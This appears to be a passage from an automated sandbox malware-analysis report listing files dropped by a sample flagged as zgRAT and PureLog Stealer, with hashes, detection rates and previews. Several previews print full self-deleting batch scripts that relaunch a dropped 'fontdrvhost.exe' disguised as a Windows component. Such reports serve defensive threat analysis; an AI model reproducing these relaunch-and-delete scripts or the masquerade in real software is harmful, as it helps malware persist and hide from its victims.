                                                                  Entropy (8bit):5.103982904593541
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIMOBC:hCRLuVFOOr+DE1wkn238GKOZG1wkn23M
                                                                  MD5:07C88661B481CAD88B40404099C4CC0E
                                                                  SHA1:A22A8F5933605C8B08FB680FEB494A8538D90A05
                                                                  SHA-256:284EF516360450DF6C3DEA46D09E0D652D185043D658B0746C54DE5DDFFCFA91
                                                                  SHA-512:C0DB3314E97D0B9BCE525BEB3238DC2E285EE860B1C7709AADC25427F2B9CBCA21DC2DDD85D4BCB0379BB3354A75AC78F556CB97928649379C5B77CC0285A06A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6WkFIbRMFr.bat"

                                                                  C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.013740920164111
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIqqhn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23F
                                                                  MD5:4B3FE765B941CC186043E2CDA941073B
                                                                  SHA1:02BD199725BAF725AB45BB6D885D343DC2B89A99
                                                                  SHA-256:1FE7F83D85A1CECD83BC027A6E4AA5B3C1E239DEC1470EE42CD9845AD3DC8876
                                                                  SHA-512:B747A27A432961671D0B10910A07B37DC6746013AC8BC7E79208579791FF08EF39880479164E46E9AFB8A3C4206B053082EC5A99EA77E3E4D358029DC741EF92
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\7nxekELsf0.bat"

                                                                  C:\Users\user\AppData\Local\Temp\9a5gxuAtmR

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.213660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:hUPa3pHLC:hgep2
                                                                  MD5:EC3D490E692003B3F06CF3ED8CEFEBC8
                                                                  SHA1:49E827AF66EACAB930A1D41CE9DB3934E8BED1C4
                                                                  SHA-256:BC825A8B016DCA231750437BC084017065555C3E85C0DFBB8A7BC6252E601CE7
                                                                  SHA-512:5A5C7A43895E01E4A820F96B3072301A0C214AE508D23794AA290633E29C2DC79294236A39970A8019F2D095E7E5424BD5DD02385291B211C468B9F3121A7143
                                                                  Malicious:false
                                                                  Preview:aW9ILXDC37L6EzWOErHgLbjVg

                                                                  C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.028872750660074
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fb0:HTg9uYDEmfHfI
                                                                  MD5:3A292AABD3E44257FD8A7EE6DBED7E09
                                                                  SHA1:2810D68994A7375D719CDFD3DDD90FE29E6E8CE9
                                                                  SHA-256:0983E85255C0D2E7D3226548BBA056FF7FA7DCC08638F8D9ECF68D8F72F7109B
                                                                  SHA-512:EA59220357F6B3F6F27DBDED27B084634F16439F6D67EC410178878DA8577C3955AF4BE3FD7DBE766222812DC1C3D22BFE19116B2C18A1F19D047B1045F5D3F3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Gu3WPocxsu.bat"

                                                                  C:\Users\user\AppData\Local\Temp\HB2xslwwvT

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774723
                                                                  Encrypted:false
                                                                  SSDEEP:3:U8oSm:U8e
                                                                  MD5:3E8C6A3FFB19DEBE2248F7EF5E567E1C
                                                                  SHA1:29F09C502F858739EE2BA2438FB54A075D3BEDD8
                                                                  SHA-256:F91C663966C01F752EA30A24BCF748456ACFE0786A2B7C69EB105AE5C4D99A18
                                                                  SHA-512:7466210466C7B3A6057ACCCEAB6132587E587859DC08EF6544BE7655671B38543135DAA47CBC0EE38DC9347A497C4343B7CCE98FDE2A7C9A18EF3D485EB914CF
                                                                  Malicious:false
                                                                  Preview:rbbjzADJctN2A8QwNMB90CU7C

                                                                  C:\Users\user\AppData\Local\Temp\Haf5RcGt9x

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.0536606896881855
                                                                  Encrypted:false
                                                                  SSDEEP:3:NOqvQs4:CR
                                                                  MD5:DFA6EB90735BF4BF6A1FCBFE2ACC5DDE
                                                                  SHA1:15878133E6B4497286C77D1F084DDD97F2BD734D
                                                                  SHA-256:0E078D58F65DC936DA3CA95B2193D23E26591069AB5AB3E984818D0D3FF72F36
                                                                  SHA-512:76594A1F1E5C48E2CFFBB56E3855C5E9566523708ACC7A59749D07300E72DD8FD719592B02738FFCE6682314EAD96CB4344FFB4B2F86D453E20496F2AB689B1A
                                                                  Malicious:false
                                                                  Preview:DDXiAILY5ZMR0YMuGviIJXDol

                                                                  C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.100174636965321
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIduHERH:hCRLuVFOOr+DE1wkn238GKOZG1wkn23l
                                                                  MD5:E6B2FE52B6E78462FAABD15DF64ADF63
                                                                  SHA1:D01AB1667A943A0E36ACE20BB5D37B77AF3075BA
                                                                  SHA-256:2472BCDC75D3866723B45A43A6EE564D2AA0C0EBFE27CBEFB44EEE3DCAF0D718
                                                                  SHA-512:B5D30E6AB5D3AFD78F69651499F6D8DD5F49A0A08CB9CC0C65592F332175BC3C8FAAB3587BE255583A666F1D6F7B5849DDE279EC7681FE8A3BA8CED444F507C2
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\I3W1TCNLwG.bat"

                                                                  C:\Users\user\AppData\Local\Temp\IlQIezJnYm

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.003856189774725
                                                                  Encrypted:false
                                                                  SSDEEP:3:180wsZO:AKO
                                                                  MD5:62DE5A7B9C3CCC3D3D1E94153C1ECD91
                                                                  SHA1:34FB0661D3597A26349C0B34426ED7657E59EC23
                                                                  SHA-256:3251F06A61AF362C129B6D9DA8976D3D2F8A33ED3A514DE0CECA281739160B96
                                                                  SHA-512:92C785B2CAC16489C56AD42A2EBA1611C55ACB576D0F24082790959F408BF17F8339EAB29FFB2B27B23A0A705C696DC4C45B07703CE6A8CCA05CCA46F979DB99
                                                                  Malicious:false
                                                                  Preview:2RPcj4pcpUXV9ljDlYKUIcA6c

                                                                  C:\Users\user\AppData\Local\Temp\J8UmnJMZzF

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:uAiHSRHGSN:uAkmGSN
                                                                  MD5:B5B5F55AA56BDA65BE3D0E8DD3330CC4
                                                                  SHA1:AF80A8406BD3EEA9D94E709AB8CF37B8DAD3E07C
                                                                  SHA-256:8F09969D7402D3B71CE25D4D6477780F69BFB4F7AD474137E5B1A83F38395C05
                                                                  SHA-512:B67571C7FE84691E3880CADA3472CE82C8D0CCC0E3A13FD8466F9D3ABE7106828DAE0A27E371807075D53C53F149E0943DE35F15157B7BBE82C2B0907E8950B3
                                                                  Malicious:false
                                                                  Preview:IjbQLPGb7tGB9hg7ML30iGA3l

                                                                  C:\Users\user\AppData\Local\Temp\JA6yKsxCrA

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:CSCeBQNpn:CSWH
                                                                  MD5:1754647E9FDB454D1414575915AACDF3
                                                                  SHA1:9839CF89341F575D735171BD77D33C420F6CB441
                                                                  SHA-256:396F25500569C5BE7578E2B721E004B1E67CFFF9DFF5276C6027BBE9DB3F9C58
                                                                  SHA-512:4980AE79BDD5F9887109616F349E099717C5F728FDB5CBC6E018B4AFCF79CBC4219DEC03A5B73278815EBC8D37A2C864B8B3866DC533BAC75BA6BE8925046098
                                                                  Malicious:false
                                                                  Preview:c0kSEhgfkFnOsQcBitiiSQ4dP

                                                                  C:\Users\user\AppData\Local\Temp\KXBTTC0yId

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):3.9736606896881854
                                                                  Encrypted:false
                                                                  SSDEEP:3:aO5wrJ9:aZ99
                                                                  MD5:5F258CC8D7F515D8B986345E19366E7A
                                                                  SHA1:A7585DE712094A6A5E29A2F0E8B4FDDB8E8AFA0A
                                                                  SHA-256:012115DD1E401469A608D4541743F22F6A60060CB4ACEC6A20DA738EBF613FF5
                                                                  SHA-512:74DC6EE5FF367F918E99B8005A2A47E07059E4AF254E356520FAF1E86670B423D8BC45E6B4F3170D7981532ED21CAB701409FF076D19641168BC24249DC86B25
                                                                  Malicious:false
                                                                  Preview:sHxHq26d2dX4sNZ5JgREs45aX

                                                                  C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.088546729988578
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIx3S+cn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23K
                                                                  MD5:1C73B623999E6677E063EE0352D1A0F3
                                                                  SHA1:031DCF8F982F903DEE7AB31BCBA948858A715CBD
                                                                  SHA-256:E04354E44BDD139CD12D85CE332324834DC6918F4BDF6184E06903A36A81B12E
                                                                  SHA-512:86F4C4971480B66B0172FD264D1225B9482377184B4B6FC1E7A58C9B7219E9DD698C4030E863EFBFE7BBB27CE31DD93DC71C9C6910BF0BFB9FAB0225A4791178
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OwDUg2gYJx.bat"

                                                                  C:\Users\user\AppData\Local\Temp\Q6MZwzjQ2O

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774723
                                                                  Encrypted:false
                                                                  SSDEEP:3:K6glLnO:K6gRO
                                                                  MD5:E96E76F8F4AFC6A853AF1CCAD8F65CFB
                                                                  SHA1:C924A6233E5AAB26BC7DB6E3CE679B2DE02EAFA0
                                                                  SHA-256:C8A4DD54005176253F1A4599C89EDEC652B90396CFF3C4552FD324204FF74482
                                                                  SHA-512:B78A128484605599F77B467991B6483B96A400F31F8A53E76A4E6CC9FCCDADDF89A75E396BFDA841A11AE21DBD1A08B0FA51BE8C89930DA3D1FF514C9816B194
                                                                  Malicious:false
                                                                  Preview:NT5jNy3CEntQz2juI2GTAWRZS

                                                                  C:\Users\user\AppData\Local\Temp\SRst0rCoYd

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.243856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:ZIUzij/d2c:+Mu/l
                                                                  MD5:A9820AFE0A394F7E478522267BDE8BF9
                                                                  SHA1:4F3CC230B64D27DEC1BD1687C3AE723180687D1B
                                                                  SHA-256:7560FA1A2D84FB8FD0B1CE346075DFF4EBC95C2D57CD401EA5E86494B120C286
                                                                  SHA-512:9DDA6A3FBB6D17353B6ECDB19117C847F5EADFFAA35C4EB20BC59D080379022673F928B3D736A52E4B33BC25ED680985E10EF3C627B4ABA745D9A7C34DC6097F
                                                                  Malicious:false
                                                                  Preview:4sIFLYVT1BVGyYv0sorrIE8S9

                                                                  C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.098885634200602
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fiH:HTg9uYDEmfHf6H
                                                                  MD5:85D5103EC14539FA1803D5459456F23F
                                                                  SHA1:5EF815F153B412F9601D2781745B560123354A0D
                                                                  SHA-256:B0740108443F438024FD4E9533B8D5AE986E62CBD274C31CCB3E9DF4184D20ED
                                                                  SHA-512:4339027C6D7B97BE2A044584427F91696C69F476F16359A919312B6F7393318DE5A77C086C7D1174884677D97945C66AA812FB3A7D9928F9DA6C3F756B75DF69
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZMh4UPVO0I.bat"

                                                                  C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.056310050289938
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIrOn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23y
                                                                  MD5:73D982FE0770009A1C0A83A1C66118A3
                                                                  SHA1:9E74F046B127C4855916C8CEBCF32619645B65A7
                                                                  SHA-256:E3BF49ABDA03EE68024741CDB154CFA18206D27FEE0CC82E5BE192034A3B94F0
                                                                  SHA-512:85D34EF0E86C2A8BAC435201AE66C20A3B388C8925B865748A21730ED992E0A766C5E3817DC90980D0AC261C89A4461DA5242CF1B55620F66E7E17E7EDCC4824
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e2HUAivGfO.bat"

                                                                  C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.041631355421024
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fth:HTg9uYDEmfHflh
                                                                  MD5:BD80F9AFD1C2BADCE5C6F813B89D778C
                                                                  SHA1:FB223B898390742CDFBE09CF1CDCEEB9DF8CC458
                                                                  SHA-256:96490DE29E333B75700430D85F321F6F171EB4B4776CE71D157DD732D6EB7E39
                                                                  SHA-512:2C83139FE9687A5D99490A33E7A4959652920171AD07A796BED1F3EEB6B7098FDC2D9F8EDFC40BAA5C292D81301B450CA5F30756FBBED07866FE26F63FB0862E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s2nU7uS06N.bat"

                                                                  C:\Users\user\AppData\Local\Temp\t4K12zjFmm

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688186
                                                                  Encrypted:false
                                                                  SSDEEP:3:45XnAbQ5n:45Xn1n
                                                                  MD5:D01CE31905D60CA4428EA3FCA29CB691
                                                                  SHA1:E8589EBE6D57FD0032196CC7F76B897AE10D92B1
                                                                  SHA-256:BEF7ACFA6E363B49D848BA46F4D0052CAC6200CE1D4C979A791331848020E4DE
                                                                  SHA-512:5E8178F5861F96BA7C5565F624D8EC0CD7C139925D2B2289466DB5C1F1A5B01576E8B46EB18781D6A0114713BFE6B6D89EFE8900D35DE6D13FE07578F7A74189
                                                                  Malicious:false
                                                                  Preview:QdLfEUb8rsbvsDeT595d251Tn

                                                                  C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.036241715905151
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIETahGK:hCRLuVFOOr+DE1wkn238GKOZG1wkn23f
                                                                  MD5:DB438837DB9485071B5B219A1B9A08BE
                                                                  SHA1:D5D48DE6D3AC1AB28C78AAEAC41E491F9238A7A6
                                                                  SHA-256:0336C04B0754D8206F9AB057C8178ED915A8B0BE9E6200E4F2CC6BBA18BF09BB
                                                                  SHA-512:47F02E82A1BF49C9EB99D80565BE7915CBE64FED5D0A4DDBDC70F589E4AAC65411175FCBD3A8350B33B3A505383A0E83A6F71BD39B3F79DF196DAECAFCB68D12
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wuC6fcDv5B.bat"

                                                                  C:\Users\user\AppData\Local\fontdrvhost.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3672576
                                                                  Entropy (8bit):7.822210869380534
                                                                  Encrypted:false
                                                                  SSDEEP:98304:ce0NRfHctOXBignPFAfL7B71KHijptuNMsZ:c1lckBiKPJCVt4Z
                                                                  MD5:4164D5955C244FF266C1CC41013FE21A
                                                                  SHA1:CD4B6CAAB8B3762D3AF3B7AD738F51D2E92C2D34
                                                                  SHA-256:138905D6721C1E6B174B6F61154A938565C9BD5C6B5B0ABE8274054BF151DA9C
                                                                  SHA-512:FA321BE81DCB76D26ACA25E1AA82145204ACDBD94026556F1031B6D29176096ABF7DE47C36DABD8A4C1C578B3BEA04E31A639481FB3890C593E597720E14E444
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                  • Antivirus: Virustotal, Detection: 73%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.......... 8.. ...@8...@.. ........................8...........@.................................. 8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ....8................. ..`.rsrc...p....@8.......8.............@....reloc.......`8.......8.............@..B................. 8.....H...........L.......h......>?-.# 8......................................0..........(.... ........8........E....M...q...).......8H...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....Q...........=...1...8L.......~....(M...~....(Q... ....?.... ....8....r...ps....z*~....:.... ....8....~....(E... .... .... ....s....~....(I....... ....~....{....:V...& ....8K......... ....~....{r...:1..

                                                                  C:\Users\user\AppData\Local\fontdrvhost.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:false
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Users\user\Desktop\AFOsBjYP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 20%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: O5OjRoFGIW.exe, Detection: malicious, Browse
                                                                  • Filename: iY40ylvr5y.exe, Detection: malicious, Browse
                                                                  • Filename: 7GTGpZi6oi.exe, Detection: malicious, Browse
                                                                  • Filename: GWCscceJsW.exe, Detection: malicious, Browse
                                                                  • Filename: QHZoYVBjSD.exe, Detection: malicious, Browse
                                                                  • Filename: qObijSd3Uj.exe, Detection: malicious, Browse
                                                                  • Filename: 2EHDj2G1ow.exe, Detection: malicious, Browse
                                                                  • Filename: UU5WXfH85a.exe, Detection: malicious, Browse
                                                                  • Filename: k6AIKkidxG.exe, Detection: malicious, Browse
                                                                  • Filename: vFfb4XhxQq.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\AaPSReOe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: O5OjRoFGIW.exe, Detection: malicious, Browse
                                                                  • Filename: iY40ylvr5y.exe, Detection: malicious, Browse
                                                                  • Filename: qObijSd3Uj.exe, Detection: malicious, Browse
                                                                  • Filename: 2EHDj2G1ow.exe, Detection: malicious, Browse
                                                                  • Filename: k6AIKkidxG.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: Um5hcJ3WPo.exe, Detection: malicious, Browse
                                                                  • Filename: y48nZSvYdA.exe, Detection: malicious, Browse
                                                                  • Filename: 919KMNiWfM.exe, Detection: malicious, Browse
                                                                  • Filename: WyuZdl33w7.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\BxnIYuRz.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
